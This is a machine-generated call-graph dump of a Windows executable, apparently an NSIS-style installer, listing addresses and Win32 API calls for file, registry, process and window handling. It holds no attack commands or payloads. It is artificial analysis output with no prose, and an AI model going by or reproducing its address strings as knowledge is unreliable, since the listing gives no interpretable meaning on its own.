3717 4027ec 3714->3717 3716 402833 3715->3716 3715->3717 3719 406050 lstrcpynW 3716->3719 3719->3717 3461 401754 3462 402bbf 18 API calls 3461->3462 3463 40175b 3462->3463 3464 405c54 2 API calls 3463->3464 3465 401762 3464->3465 3466 405c54 2 API calls 3465->3466 3466->3465 3720 401d56 GetDC GetDeviceCaps 3721 402ba2 18 API calls 3720->3721 3722 401d74 MulDiv ReleaseDC 3721->3722 3723 402ba2 18 API calls 3722->3723 3724 401d93 3723->3724 3725 406072 18 API calls 3724->3725 3726 401dcc CreateFontIndirectW 3725->3726 3727 402531 3726->3727 3728 401a57 3729 402ba2 18 API calls 3728->3729 3730 401a5d 3729->3730 3731 402ba2 18 API calls 3730->3731 3732 401a05 3731->3732 3733 403857 3734 403862 3733->3734 3735 403866 3734->3735 3736 403869 GlobalAlloc 3734->3736 3736->3735 3737 4014d7 3738 402ba2 18 API calls 3737->3738 3739 4014dd Sleep 3738->3739 3741 402a4c 3739->3741 3742 40155b 3743 4029f2 3742->3743 3746 405f97 wsprintfW 3743->3746 3745 4029f7 3746->3745 3507 401ddc 3515 402ba2 3507->3515 3509 401de2 3510 402ba2 18 API calls 3509->3510 3511 401deb 3510->3511 3512 401df2 ShowWindow 3511->3512 3513 401dfd EnableWindow 3511->3513 3514 402a4c 3512->3514 3513->3514 3516 406072 18 API calls 3515->3516 3517 402bb6 3516->3517 3517->3509 3601 401bdf 3602 402ba2 18 API calls 3601->3602 3603 401be6 3602->3603 3604 402ba2 18 API calls 3603->3604 3605 401bf0 3604->3605 3606 401c00 3605->3606 3608 402bbf 18 API calls 3605->3608 3607 401c10 3606->3607 3609 402bbf 18 API calls 3606->3609 3610 401c1b 3607->3610 3611 401c5f 3607->3611 3608->3606 3609->3607 3612 402ba2 18 API calls 3610->3612 3613 402bbf 18 API calls 3611->3613 3614 401c20 3612->3614 3615 401c64 3613->3615 3616 402ba2 18 API calls 3614->3616 3617 402bbf 18 API calls 3615->3617 3619 401c29 3616->3619 3618 401c6d FindWindowExW 3617->3618 3622 401c8f 3618->3622 3620 401c31 SendMessageTimeoutW 3619->3620 3621 401c4f SendMessageW 3619->3621 3620->3622 3621->3622 3747 4022df 3748 402bbf 18 API calls 3747->3748 3749 4022ee 3748->3749 3750 402bbf 18 API calls 3749->3750 3751 4022f7 3750->3751 3752 402bbf 18 API calls 3751->3752 3753 402301 GetPrivateProfileStringW 3752->3753 3754 401960 3755 402ba2 18 API calls 3754->3755 3756 401967 3755->3756 3757 402ba2 18 API calls 3756->3757 3758 401971 3757->3758 3759 402bbf 18 API calls 3758->3759 3760 40197a 3759->3760 3761 40198e lstrlenW 3760->3761 3763 4019ca 3760->3763 3762 401998 3761->3762 3762->3763 3767 406050 lstrcpynW 3762->3767 3765 4019b3 3765->3763 3766 4019c0 lstrlenW 3765->3766 3766->3763 3767->3765 3768 404262 lstrlenW 3769 404281 3768->3769 3770 404283 WideCharToMultiByte 3768->3770 3769->3770 3771 401662 3772 402bbf 18 API calls 3771->3772 3773 401668 3772->3773 3774 406393 2 API calls 3773->3774 3775 40166e 3774->3775 3776 4019e4 3777 402bbf 18 API calls 3776->3777 3778 4019eb 3777->3778 3779 402bbf 18 API calls 3778->3779 3780 4019f4 3779->3780 3781 4019fb lstrcmpiW 3780->3781 3782 401a0d lstrcmpW 3780->3782 3783 401a01 3781->3783 3782->3783 3784 4025e5 3785 402ba2 18 API calls 3784->3785 3794 4025f4 3785->3794 3786 40272d 3787 40263a ReadFile 3787->3786 3787->3794 3788 405ca8 ReadFile 3788->3794 3790 40267a MultiByteToWideChar 3790->3794 3791 40272f 3806 405f97 wsprintfW 3791->3806 3793 4026a0 SetFilePointer MultiByteToWideChar 3793->3794 3794->3786 3794->3787 3794->3788 3794->3790 3794->3791 3794->3793 3795 402740 3794->3795 3797 405d06 SetFilePointer 3794->3797 3795->3786 3796 402761 SetFilePointer 3795->3796 3796->3786 3798 405d22 3797->3798 3803 405d3e 3797->3803 3799 405ca8 ReadFile 3798->3799 3800 405d2e 3799->3800 3801 405d47 SetFilePointer 3800->3801 3802 405d6f SetFilePointer 3800->3802 3800->3803 3801->3802 3804 405d52 3801->3804 3802->3803 3803->3794 3805 405cd7 WriteFile 3804->3805 3805->3803 3806->3786 3332 401e66 3333 402bbf 18 API calls 3332->3333 3334 401e6c 3333->3334 3335 4051af 25 API calls 3334->3335 3336 401e76 3335->3336 3337 405730 2 API calls 3336->3337 3338 401e7c 3337->3338 3339 40281e 3338->3339 3340 401edb CloseHandle 3338->3340 3341 401e8c WaitForSingleObject 3338->3341 3340->3339 3343 401e9e 3341->3343 3342 401eb0 GetExitCodeProcess 3345 401ec2 3342->3345 3346 401ecf 3342->3346 3343->3342 3344 406466 2 API calls 3343->3344 3349 401ea5 WaitForSingleObject 3344->3349 3350 405f97 wsprintfW 3345->3350 3346->3340 3348 401ecd 3346->3348 3348->3340 3349->3343 3350->3348 3351 401767 3352 402bbf 18 API calls 3351->3352 3353 40176e 3352->3353 3354 401796 3353->3354 3355 40178e 3353->3355 3391 406050 lstrcpynW 3354->3391 3390 406050 lstrcpynW 3355->3390 3358 401794 3362 4062e4 5 API calls 3358->3362 3359 4017a1 3360 405a04 3 API calls 3359->3360 3361 4017a7 lstrcatW 3360->3361 3361->3358 3372 4017b3 3362->3372 3363 406393 2 API calls 3363->3372 3364 405c00 2 API calls 3364->3372 3366 4017c5 CompareFileTime 3366->3372 3367 401885 3368 4051af 25 API calls 3367->3368 3370 40188f 3368->3370 3369 4051af 25 API calls 3371 401871 3369->3371 3373 403027 32 API calls 3370->3373 3372->3363 3372->3364 3372->3366 3372->3367 3377 406072 18 API calls 3372->3377 3381 406050 lstrcpynW 3372->3381 3386 405795 MessageBoxIndirectW 3372->3386 3387 40185c 3372->3387 3389 405c25 GetFileAttributesW CreateFileW 3372->3389 3374 4018a2 3373->3374 3375 4018b6 SetFileTime 3374->3375 3376 4018c8 CloseHandle 3374->3376 3375->3376 3376->3371 3378 4018d9 3376->3378 3377->3372 3379 4018f1 3378->3379 3380 4018de 3378->3380 3383 406072 18 API calls 3379->3383 3382 406072 18 API calls 3380->3382 3381->3372 3384 4018e6 lstrcatW 3382->3384 3385 4018f9 3383->3385 3384->3385 3388 405795 MessageBoxIndirectW 3385->3388 3386->3372 3387->3369 3387->3371 3388->3371 3389->3372 3390->3358 3391->3359 3807 404568 3808 404578 3807->3808 3809 40459e 3807->3809 3811 404114 19 API calls 3808->3811 3810 40417b 8 API calls 3809->3810 3812 4045aa 3810->3812 3813 404585 SetDlgItemTextW 3811->3813 3813->3809 3814 401ee9 3815 402bbf 18 API calls 3814->3815 3816 401ef0 3815->3816 3817 406393 2 API calls 3816->3817 3818 401ef6 3817->3818 3820 401f07 3818->3820 3821 405f97 wsprintfW 3818->3821 3821->3820 3822 4021ea 3823 402bbf 18 API calls 3822->3823 3824 4021f0 3823->3824 3825 402bbf 18 API calls 3824->3825 3826 4021f9 3825->3826 3827 402bbf 18 API calls 3826->3827 3828 402202 3827->3828 3829 406393 2 API calls 3828->3829 3830 40220b 3829->3830 3831 40221c lstrlenW lstrlenW 3830->3831 3832 40220f 3830->3832 3834 4051af 25 API calls 3831->3834 3833 4051af 25 API calls 3832->3833 3835 402217 3832->3835 3833->3835 3836 40225a SHFileOperationW 3834->3836 3836->3832 3836->3835 3837 40156b 3838 401584 3837->3838 3839 40157b ShowWindow 3837->3839 3840 401592 ShowWindow 3838->3840 3841 402a4c 3838->3841 3839->3838 3840->3841 3392 4052ee 3393 405498 3392->3393 3394 40530f GetDlgItem GetDlgItem GetDlgItem 3392->3394 3396 4054a1 GetDlgItem CreateThread CloseHandle 3393->3396 3397 4054c9 3393->3397 3437 404149 SendMessageW 3394->3437 3396->3397 3460 405282 5 API calls 3396->3460 3399 4054e0 ShowWindow ShowWindow 3397->3399 3400 405519 3397->3400 3401 4054f4 3397->3401 3398 40537f 3403 405386 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3398->3403 3442 404149 SendMessageW 3399->3442 3446 40417b 3400->3446 3402 405554 3401->3402 3405 405508 3401->3405 3406 40552e ShowWindow 3401->3406 3402->3400 3412 405562 SendMessageW 3402->3412 3410 4053f4 3403->3410 3411 4053d8 SendMessageW SendMessageW 3403->3411 3443 4040ed 3405->3443 3408 405540 3406->3408 3409 40554e 3406->3409 3415 4051af 25 API calls 3408->3415 3416 4040ed SendMessageW 3409->3416 3417 405407 3410->3417 3418 4053f9 SendMessageW 3410->3418 3411->3410 3414 405527 3412->3414 3419 40557b CreatePopupMenu 3412->3419 3415->3409 3416->3402 3438 404114 3417->3438 3418->3417 3420 406072 18 API calls 3419->3420 3422 40558b AppendMenuW 3420->3422 3424 4055a8 GetWindowRect 3422->3424 3425 4055bb TrackPopupMenu 3422->3425 3423 405417 3426 405420 ShowWindow 3423->3426 3427 405454 GetDlgItem SendMessageW 3423->3427 3424->3425 3425->3414 3429 4055d6 3425->3429 3430 405436 ShowWindow 3426->3430 3432 405443 3426->3432 3427->3414 3428 40547b SendMessageW SendMessageW 3427->3428 3428->3414 3431 4055f2 SendMessageW 3429->3431 3430->3432 3431->3431 3433 40560f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3431->3433 3441 404149 SendMessageW 3432->3441 3435 405634 SendMessageW 3433->3435 3435->3435 3436 40565d GlobalUnlock SetClipboardData CloseClipboard 3435->3436 3436->3414 3437->3398 3439 406072 18 API calls 3438->3439 3440 40411f SetDlgItemTextW 3439->3440 3440->3423 3441->3427 3442->3401 3444 4040f4 3443->3444 3445 4040fa SendMessageW 3443->3445 3444->3445 3445->3400 3447 404193 GetWindowLongW 3446->3447 3457 40421c 3446->3457 3448 4041a4 3447->3448 3447->3457 3449 4041b3 GetSysColor 3448->3449 3450 4041b6 3448->3450 3449->3450 3451 4041c6 SetBkMode 3450->3451 3452 4041bc SetTextColor 3450->3452 3453 4041e4 3451->3453 3454 4041de GetSysColor 3451->3454 3452->3451 3455 4041f5 3453->3455 3456 4041eb SetBkColor 3453->3456 3454->3453 3455->3457 3458 404208 DeleteObject 3455->3458 3459 40420f CreateBrushIndirect 3455->3459 3456->3455 3457->3414 3458->3459 3459->3457 3842 40226e 3843 402275 3842->3843 3847 402288 3842->3847 3844 406072 18 API calls 3843->3844 3845 402282 3844->3845 3846 405795 MessageBoxIndirectW 3845->3846 3846->3847 3848 4014f1 SetForegroundWindow 3849 402a4c 3848->3849 3850 401673 3851 402bbf 18 API calls 3850->3851 3852 40167a 3851->3852 3853 402bbf 18 API calls 3852->3853 3854 401683 3853->3854 3855 402bbf 18 API calls 3854->3855 3856 40168c MoveFileW 3855->3856 3857 401698 3856->3857 3858 40169f 3856->3858 3859 401423 25 API calls 3857->3859 3860 406393 2 API calls 3858->3860 3862 4021e1 3858->3862 3859->3862 3861 4016ae 3860->3861 3861->3862 3863 405ef1 38 API calls 3861->3863 3863->3857 3864 401cfa GetDlgItem GetClientRect 3865 402bbf 18 API calls 3864->3865 3866 401d2c LoadImageW SendMessageW 3865->3866 3867 401d4a DeleteObject 3866->3867 3868 402a4c 3866->3868 3867->3868 3493 4027fb 3494 402bbf 18 API calls 3493->3494 3495 402802 FindFirstFileW 3494->3495 3496 402815 3495->3496 3497 40282a 3495->3497 3498 402833 3497->3498 3501 405f97 wsprintfW 3497->3501 3502 406050 lstrcpynW 3498->3502 3501->3498 3502->3496 3869 40237b 3870 402381 3869->3870 3871 402bbf 18 API calls 3870->3871 3872 402393 3871->3872 3873 402bbf 18 API calls 3872->3873 3874 40239d RegCreateKeyExW 3873->3874 3875 4023c7 3874->3875 3876 402a4c 3874->3876 3877 4023e2 3875->3877 3878 402bbf 18 API calls 3875->3878 3879 4023ee 3877->3879 3881 402ba2 18 API calls 3877->3881 3880 4023d8 lstrlenW 3878->3880 3882 402409 RegSetValueExW 3879->3882 3883 403027 32 API calls 3879->3883 3880->3877 3881->3879 3884 40241f RegCloseKey 3882->3884 3883->3882 3884->3876 3886 4014ff 3887 401507 3886->3887 3888 40151a 3886->3888 3889 402ba2 18 API calls 3887->3889 3889->3888 3890 401000 3891 401037 BeginPaint GetClientRect 3890->3891 3893 40100c DefWindowProcW 3890->3893 3894 4010f3 3891->3894 3895 401179 3893->3895 3896 401073 CreateBrushIndirect FillRect DeleteObject 3894->3896 3897 4010fc 3894->3897 3896->3894 3898 401102 CreateFontIndirectW 3897->3898 3899 401167 EndPaint 3897->3899 3898->3899 3900 401112 6 API calls 3898->3900 3899->3895 3900->3899 3901 401904 3902 40193b 3901->3902 3903 402bbf 18 API calls 3902->3903 3904 401940 3903->3904 3905 405841 69 API calls 3904->3905 3906 401949 3905->3906 3907 402d04 3908 402d16 SetTimer 3907->3908 3909 402d2f 3907->3909 3908->3909 3910 402d84 3909->3910 3911 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3909->3911 3911->3910 3912 404905 3913 404931 3912->3913 3914 404915 3912->3914 3916 404964 3913->3916 3917 404937 SHGetPathFromIDListW 3913->3917 3923 405779 GetDlgItemTextW 3914->3923 3919 40494e SendMessageW 3917->3919 3920 404947 3917->3920 3918 404922 SendMessageW 3918->3913 3919->3916 3921 40140b 2 API calls 3920->3921 3921->3919 3923->3918 3924 402786 3925 4029f7 3924->3925 3926 40278d 3924->3926 3927 402ba2 18 API calls 3926->3927 3928 402798 3927->3928 3929 40279f SetFilePointer 3928->3929 3929->3925 3930 4027af 3929->3930 3932 405f97 wsprintfW 3930->3932 3932->3925 3933 401907 3934 402bbf 18 API calls 3933->3934 3935 40190e 3934->3935 3936 405795 MessageBoxIndirectW 3935->3936 3937 401917 3936->3937 3938 401e08 3939 402bbf 18 API calls 3938->3939 3940 401e0e 3939->3940 3941 402bbf 18 API calls 3940->3941 3942 401e17 3941->3942 3943 402bbf 18 API calls 3942->3943 3944 401e20 3943->3944 3945 402bbf 18 API calls 3944->3945 3946 401e29 3945->3946 3947 401423 25 API calls 3946->3947 3948 401e30 ShellExecuteW 3947->3948 3949 401e61 3948->3949 3955 401a15 3956 402bbf 18 API calls 3955->3956 3957 401a1e ExpandEnvironmentStringsW 3956->3957 3958 401a32 3957->3958 3960 401a45 3957->3960 3959 401a37 lstrcmpW 3958->3959 3958->3960 3959->3960 3961 402515 3962 402bbf 18 API calls 3961->3962 3963 40251c 3962->3963 3966 405c25 GetFileAttributesW CreateFileW 3963->3966 3965 402528 3966->3965 3967 402095 3968 402bbf 18 API calls 3967->3968 3969 40209c 3968->3969 3970 402bbf 18 API calls 3969->3970 3971 4020a6 3970->3971 3972 402bbf 18 API calls 3971->3972 3973 4020b0 3972->3973 3974 402bbf 18 API calls 3973->3974 3975 4020ba 3974->3975 3976 402bbf 18 API calls 3975->3976 3978 4020c4 3976->3978 3977 402103 CoCreateInstance 3982 402122 3977->3982 3978->3977 3979 402bbf 18 API calls 3978->3979 3979->3977 3980 401423 25 API calls 3981 4021e1 3980->3981 3982->3980 3982->3981 3983 401b16 3984 402bbf 18 API calls 3983->3984 3985 401b1d 3984->3985 3986 402ba2 18 API calls 3985->3986 3987 401b26 wsprintfW 3986->3987 3988 402a4c 3987->3988 3503 40159b 3504 402bbf 18 API calls 3503->3504 3505 4015a2 SetFileAttributesW 3504->3505 3506 4015b4 3505->3506 3591 40229d 3592 4022a5 3591->3592 3593 4022ab 3591->3593 3594 402bbf 18 API calls 3592->3594 3595 4022b9 3593->3595 3596 402bbf 18 API calls 3593->3596 3594->3593 3597 402bbf 18 API calls 3595->3597 3599 4022c7 3595->3599 3596->3595 3597->3599 3598 402bbf 18 API calls 3600 4022d0 WritePrivateProfileStringW 3598->3600 3599->3598 3989 401f1d 3990 402bbf 18 API calls 3989->3990 3991 401f24 3990->3991 3992 40642a 5 API calls 3991->3992 3993 401f33 3992->3993 3994 401f4f GlobalAlloc 3993->3994 3997 401fb7 3993->3997 3995 401f63 3994->3995 3994->3997 3996 40642a 5 API calls 3995->3996 3998 401f6a 3996->3998 3999 40642a 5 API calls 3998->3999 4000 401f74 3999->4000 4000->3997 4004 405f97 wsprintfW 4000->4004 4002 401fa9 4005 405f97 wsprintfW 4002->4005 4004->4002 4005->3997 4006 40149e 4007 402288 4006->4007 4008 4014ac PostQuitMessage 4006->4008 4008->4007 4009 40249e 4010 402cc9 19 API calls 4009->4010 4011 4024a8 4010->4011 4012 402ba2 18 API calls 4011->4012 4013 4024b1 4012->4013 4014 4024d5 RegEnumValueW 4013->4014 4015 4024c9 RegEnumKeyW 4013->4015 4016 40281e 4013->4016 4014->4016 4017 4024ee RegCloseKey 4014->4017 4015->4017 4017->4016 3623 40231f 3624 402324 3623->3624 3625 40234f 3623->3625 3646 402cc9 3624->3646 3627 402bbf 18 API calls 3625->3627 3629 402356 3627->3629 3628 40232b 3630 402335 3628->3630 3634 40236c 3628->3634 3635 402bff RegOpenKeyExW 3629->3635 3631 402bbf 18 API calls 3630->3631 3632 40233c RegDeleteValueW RegCloseKey 3631->3632 3632->3634 3636 402c93 3635->3636 3643 402c2a 3635->3643 3636->3634 3637 402c50 RegEnumKeyW 3638 402c62 RegCloseKey 3637->3638 3637->3643 3640 40642a 5 API calls 3638->3640 3639 402c87 RegCloseKey 3644 402c76 3639->3644 3642 402c72 3640->3642 3641 402bff 5 API calls 3641->3643 3642->3644 3645 402ca2 RegDeleteKeyW 3642->3645 3643->3637 3643->3638 3643->3639 3643->3641 3644->3636 3645->3644 3647 402bbf 18 API calls 3646->3647 3648 402ce2 3647->3648 3649 402cf0 RegOpenKeyExW 3648->3649 3649->3628 2821 4032a0 SetErrorMode GetVersion 2822 4032d5 2821->2822 2823 4032db 2821->2823 2824 40642a 5 API calls 2822->2824 2909 4063ba GetSystemDirectoryW 2823->2909 2824->2823 2826 4032f1 lstrlenA 2826->2823 2827 403301 2826->2827 2912 40642a GetModuleHandleA 2827->2912 2830 40642a 5 API calls 2831 403310 #17 OleInitialize SHGetFileInfoW 2830->2831 2918 406050 lstrcpynW 2831->2918 2833 40334d GetCommandLineW 2919 406050 lstrcpynW 2833->2919 2835 40335f GetModuleHandleW 2836 403377 2835->2836 2920 405a31 2836->2920 2839 4034b0 GetTempPathW 2924 40326f 2839->2924 2841 4034c8 2842 403522 DeleteFileW 2841->2842 2843 4034cc GetWindowsDirectoryW lstrcatW 2841->2843 2934 402dee GetTickCount GetModuleFileNameW 2842->2934 2844 40326f 12 API calls 2843->2844 2847 4034e8 2844->2847 2845 405a31 CharNextW 2848 40339f 2845->2848 2847->2842 2849 4034ec GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2847->2849 2848->2845 2851 40349b 2848->2851 2853 403499 2848->2853 2852 40326f 12 API calls 2849->2852 3018 406050 lstrcpynW 2851->3018 2860 40351a 2852->2860 2853->2839 2854 4035d9 2962 403899 2854->2962 2855 403536 2855->2854 2857 405a31 CharNextW 2855->2857 2861 4035e9 2855->2861 2873 403555 2857->2873 2860->2842 2860->2861 3035 4037bf 2861->3035 2862 403723 2865 4037a7 ExitProcess 2862->2865 2866 40372b GetCurrentProcess OpenProcessToken 2862->2866 2863 403603 3042 405795 2863->3042 2871 403743 LookupPrivilegeValueW AdjustTokenPrivileges 2866->2871 2872 403777 2866->2872 2868 4035b3 3019 405b0c 2868->3019 2869 403619 3046 405718 2869->3046 2871->2872 2876 40642a 5 API calls 2872->2876 2873->2868 2873->2869 2879 40377e 2876->2879 2880 403793 ExitWindowsEx 2879->2880 2883 4037a0 2879->2883 2880->2865 2880->2883 2881 40363a lstrcatW lstrcmpiW 2881->2861 2885 403656 2881->2885 2882 40362f lstrcatW 2882->2881 3084 40140b 2883->3084 2888 403662 2885->2888 2889 40365b 2885->2889 2887 4035ce 3034 406050 lstrcpynW 2887->3034 3054 4056fb CreateDirectoryW 2888->3054 3049 40567e CreateDirectoryW 2889->3049 2894 403667 SetCurrentDirectoryW 2895 403682 2894->2895 2896 403677 2894->2896 3058 406050 lstrcpynW 2895->3058 3057 406050 lstrcpynW 2896->3057 2901 4036ce CopyFileW 2906 403690 2901->2906 2902 403717 2903 405ef1 38 API calls 2902->2903 2903->2861 2905 406072 18 API calls 2905->2906 2906->2902 2906->2905 2908 403702 CloseHandle 2906->2908 3059 406072 2906->3059 3077 405ef1 MoveFileExW 2906->3077 3081 405730 CreateProcessW 2906->3081 2908->2906 2910 4063dc wsprintfW LoadLibraryExW 2909->2910 2910->2826 2913 406450 GetProcAddress 2912->2913 2914 406446 2912->2914 2916 403309 2913->2916 2915 4063ba 3 API calls 2914->2915 2917 40644c 2915->2917 2916->2830 2917->2913 2917->2916 2918->2833 2919->2835 2921 405a37 2920->2921 2922 403386 CharNextW 2921->2922 2923 405a3e CharNextW 2921->2923 2922->2839 2922->2848 2923->2921 3087 4062e4 2924->3087 2926 403285 2926->2841 2927 40327b 2927->2926 3096 405a04 lstrlenW CharPrevW 2927->3096 2930 4056fb 2 API calls 2931 403293 2930->2931 3099 405c54 2931->3099 3103 405c25 GetFileAttributesW CreateFileW 2934->3103 2936 402e2e 2956 402e3e 2936->2956 3104 406050 lstrcpynW 2936->3104 2938 402e54 3105 405a50 lstrlenW 2938->3105 2942 402e65 GetFileSize 2943 402f61 2942->2943 2961 402e7c 2942->2961 3110 402d8a 2943->3110 2945 402f6a 2947 402f9a GlobalAlloc 2945->2947 2945->2956 3145 403258 SetFilePointer 2945->3145 3121 403258 SetFilePointer 2947->3121 2948 402fcd 2953 402d8a 6 API calls 2948->2953 2951 402f83 2954 403242 ReadFile 2951->2954 2952 402fb5 3122 403027 2952->3122 2953->2956 2957 402f8e 2954->2957 2956->2855 2957->2947 2957->2956 2958 402d8a 6 API calls 2958->2961 2959 402fc1 2959->2956 2959->2959 2960 402ffe SetFilePointer 2959->2960 2960->2956 2961->2943 2961->2948 2961->2956 2961->2958 3142 403242 2961->3142 2963 40642a 5 API calls 2962->2963 2964 4038ad 2963->2964 2965 4038b3 2964->2965 2966 4038c5 2964->2966 3182 405f97 wsprintfW 2965->3182 3183 405f1d RegOpenKeyExW 2966->3183 2970 403914 lstrcatW 2971 4038c3 2970->2971 3166 403b6f 2971->3166 2972 405f1d 3 API calls 2972->2970 2975 405b0c 18 API calls 2976 403946 2975->2976 2977 4039da 2976->2977 2980 405f1d 3 API calls 2976->2980 2978 405b0c 18 API calls 2977->2978 2979 4039e0 2978->2979 2982 4039f0 LoadImageW 2979->2982 2983 406072 18 API calls 2979->2983 2981 403978 2980->2981 2981->2977 2986 403999 lstrlenW 2981->2986 2990 405a31 CharNextW 2981->2990 2984 403a96 2982->2984 2985 403a17 RegisterClassW 2982->2985 2983->2982 2989 40140b 2 API calls 2984->2989 2987 403aa0 2985->2987 2988 403a4d SystemParametersInfoW CreateWindowExW 2985->2988 2991 4039a7 lstrcmpiW 2986->2991 2992 4039cd 2986->2992 2987->2861 2988->2984 2993 403a9c 2989->2993 2994 403996 2990->2994 2991->2992 2995 4039b7 GetFileAttributesW 2991->2995 2996 405a04 3 API calls 2992->2996 2993->2987 2998 403b6f 19 API calls 2993->2998 2994->2986 2997 4039c3 2995->2997 2999 4039d3 2996->2999 2997->2992 3000 405a50 2 API calls 2997->3000 3001 403aad 2998->3001 3188 406050 lstrcpynW 2999->3188 3000->2992 3003 403ab9 ShowWindow 3001->3003 3004 403b3c 3001->3004 3006 4063ba 3 API calls 3003->3006 3175 405282 OleInitialize 3004->3175 3007 403ad1 3006->3007 3009 403adf GetClassInfoW 3007->3009 3011 4063ba 3 API calls 3007->3011 3008 403b42 3010 403b5e 3008->3010 3015 403b46 3008->3015 3013 403af3 GetClassInfoW RegisterClassW 3009->3013 3014 403b09 DialogBoxParamW 3009->3014 3012 40140b 2 API calls 3010->3012 3011->3009 3012->2987 3013->3014 3016 40140b 2 API calls 3014->3016 3015->2987 3017 40140b 2 API calls 3015->3017 3016->2987 3017->2987 3018->2853 3197 406050 lstrcpynW 3019->3197 3021 405b1d 3198 405aaf CharNextW CharNextW 3021->3198 3024 4035bf 3024->2861 3033 406050 lstrcpynW 3024->3033 3025 4062e4 5 API calls 3031 405b33 3025->3031 3026 405b64 lstrlenW 3027 405b6f 3026->3027 3026->3031 3028 405a04 3 API calls 3027->3028 3030 405b74 GetFileAttributesW 3028->3030 3030->3024 3031->3024 3031->3026 3032 405a50 2 API calls 3031->3032 3204 406393 FindFirstFileW 3031->3204 3032->3026 3033->2887 3034->2854 3036 4037d7 3035->3036 3037 4037c9 CloseHandle 3035->3037 3207 403804 3036->3207 3037->3036 3043 4057aa 3042->3043 3044 403611 ExitProcess 3043->3044 3045 4057be MessageBoxIndirectW 3043->3045 3045->3044 3047 40642a 5 API calls 3046->3047 3048 40361e lstrcatW 3047->3048 3048->2881 3048->2882 3050 403660 3049->3050 3051 4056cf GetLastError 3049->3051 3050->2894 3051->3050 3052 4056de SetFileSecurityW 3051->3052 3052->3050 3053 4056f4 GetLastError 3052->3053 3053->3050 3055 40570b 3054->3055 3056 40570f GetLastError 3054->3056 3055->2894 3056->3055 3057->2895 3058->2906 3062 40607f 3059->3062 3060 4062ca 3061 4036c1 DeleteFileW 3060->3061 3265 406050 lstrcpynW 3060->3265 3061->2901 3061->2906 3062->3060 3064 406132 GetVersion 3062->3064 3065 406298 lstrlenW 3062->3065 3068 406072 10 API calls 3062->3068 3069 405f1d 3 API calls 3062->3069 3070 4061ad GetSystemDirectoryW 3062->3070 3071 4061c0 GetWindowsDirectoryW 3062->3071 3072 4062e4 5 API calls 3062->3072 3073 4061f4 SHGetSpecialFolderLocation 3062->3073 3074 406072 10 API calls 3062->3074 3075 406239 lstrcatW 3062->3075 3263 405f97 wsprintfW 3062->3263 3264 406050 lstrcpynW 3062->3264 3064->3062 3065->3062 3068->3065 3069->3062 3070->3062 3071->3062 3072->3062 3073->3062 3076 40620c SHGetPathFromIDListW CoTaskMemFree 3073->3076 3074->3062 3075->3062 3076->3062 3078 405f12 3077->3078 3079 405f05 3077->3079 3078->2906 3266 405d7f lstrcpyW 3079->3266 3082 405763 CloseHandle 3081->3082 3083 40576f 3081->3083 3082->3083 3083->2906 3085 401389 2 API calls 3084->3085 3086 401420 3085->3086 3086->2865 3093 4062f1 3087->3093 3088 406367 3089 40636c CharPrevW 3088->3089 3091 40638d 3088->3091 3089->3088 3090 40635a CharNextW 3090->3088 3090->3093 3091->2927 3092 405a31 CharNextW 3092->3093 3093->3088 3093->3090 3093->3092 3094 406346 CharNextW 3093->3094 3095 406355 CharNextW 3093->3095 3094->3093 3095->3090 3097 405a20 lstrcatW 3096->3097 3098 40328d 3096->3098 3097->3098 3098->2930 3100 405c61 GetTickCount GetTempFileNameW 3099->3100 3101 40329e 3100->3101 3102 405c97 3100->3102 3101->2841 3102->3100 3102->3101 3103->2936 3104->2938 3106 405a5e 3105->3106 3107 402e5a 3106->3107 3108 405a64 CharPrevW 3106->3108 3109 406050 lstrcpynW 3107->3109 3108->3106 3108->3107 3109->2942 3111 402d93 3110->3111 3112 402dab 3110->3112 3113 402da3 3111->3113 3114 402d9c DestroyWindow 3111->3114 3115 402db3 3112->3115 3116 402dbb GetTickCount 3112->3116 3113->2945 3114->3113 3146 406466 3115->3146 3118 402dc9 CreateDialogParamW ShowWindow 3116->3118 3119 402dec 3116->3119 3118->3119 3119->2945 3121->2952 3123 403040 3122->3123 3124 40306e 3123->3124 3163 403258 SetFilePointer 3123->3163 3125 403242 ReadFile 3124->3125 3127 403079 3125->3127 3128 4031db 3127->3128 3129 40308b GetTickCount 3127->3129 3131 4031c5 3127->3131 3130 40321d 3128->3130 3135 4031df 3128->3135 3129->3131 3138 4030da 3129->3138 3132 403242 ReadFile 3130->3132 3131->2959 3132->3131 3133 403242 ReadFile 3133->3138 3134 403242 ReadFile 3134->3135 3135->3131 3135->3134 3136 405cd7 WriteFile 3135->3136 3136->3135 3137 403130 GetTickCount 3137->3138 3138->3131 3138->3133 3138->3137 3139 403155 MulDiv wsprintfW 3138->3139 3161 405cd7 WriteFile 3138->3161 3150 4051af 3139->3150 3164 405ca8 ReadFile 3142->3164 3145->2951 3147 406483 PeekMessageW 3146->3147 3148 402db9 3147->3148 3149 406479 DispatchMessageW 3147->3149 3148->2945 3149->3147 3151 4051ca 3150->3151 3160 40526c 3150->3160 3152 4051e6 lstrlenW 3151->3152 3153 406072 18 API calls 3151->3153 3154 4051f4 lstrlenW 3152->3154 3155 40520f 3152->3155 3153->3152 3156 405206 lstrcatW 3154->3156 3154->3160 3157 405222 3155->3157 3158 405215 SetWindowTextW 3155->3158 3156->3155 3159 405228 SendMessageW SendMessageW SendMessageW 3157->3159 3157->3160 3158->3157 3159->3160 3160->3138 3162 405cf5 3161->3162 3162->3138 3163->3124 3165 403255 3164->3165 3165->2961 3167 403b83 3166->3167 3189 405f97 wsprintfW 3167->3189 3169 403bf4 3170 406072 18 API calls 3169->3170 3171 403c00 SetWindowTextW 3170->3171 3172 403924 3171->3172 3173 403c1c 3171->3173 3172->2975 3173->3172 3174 406072 18 API calls 3173->3174 3174->3173 3190 404160 3175->3190 3177 4052cc 3178 404160 SendMessageW 3177->3178 3180 4052de CoUninitialize 3178->3180 3179 4052a5 3179->3177 3193 401389 3179->3193 3180->3008 3182->2971 3184 4038f5 3183->3184 3185 405f51 RegQueryValueExW 3183->3185 3184->2970 3184->2972 3187 405f72 RegCloseKey 3185->3187 3187->3184 3188->2977 3189->3169 3191 404178 3190->3191 3192 404169 SendMessageW 3190->3192 3191->3179 3192->3191 3195 401390 3193->3195 3194 4013fe 3194->3179 3195->3194 3196 4013cb MulDiv SendMessageW 3195->3196 3196->3195 3197->3021 3199 405acc 3198->3199 3203 405ade 3198->3203 3200 405ad9 CharNextW 3199->3200 3199->3203 3201 405b02 3200->3201 3201->3024 3201->3025 3202 405a31 CharNextW 3202->3203 